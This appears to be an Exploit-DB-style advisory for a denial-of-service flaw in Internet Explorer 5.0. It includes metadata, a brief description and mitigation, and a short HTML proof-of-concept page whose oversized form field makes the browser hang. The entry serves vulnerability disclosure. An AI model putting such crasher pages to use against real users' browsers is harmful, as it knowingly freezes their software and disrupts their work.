Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

vendor:

Internet Explorer

by:

NeonBunny

7.5

CVSS

HIGH

Denial of Service (DoS)

CWE

Product Name: Internet Explorer

Affected Version From: IE 5.0

Affected Version To: IE 5.0

Patch Exists: NO

Related CWE: N/A

CPE: a:microsoft:internet_explorer:5.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 95/Windows 98/Windows NT 4

2000

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to 'hang' and consume 100% CPU resources until the application is closed.

Mitigation:

Ensure that HTML form fields are not too large and that HTML tables are not too complex.

Source

Exploit-DB raw data:

Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 HTML Form Control DoS

source: https://www.securityfocus.com/bid/606/info

Certain Microsoft applications (IE5, Outlook Express 5) are unable to display large HTML form fields within HTML tables. Attempts to view the offending table will cause the application to "hang" and consume 100% CPU resources until the application is closed. 

---{START SOURCE}---

<html>

<head>
<title>NeonBunny's IE5 Crasher</title>
</head>

<body>

<form method="POST">

<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>

</form>
</body>
</html>

---{STOP SOURCE}---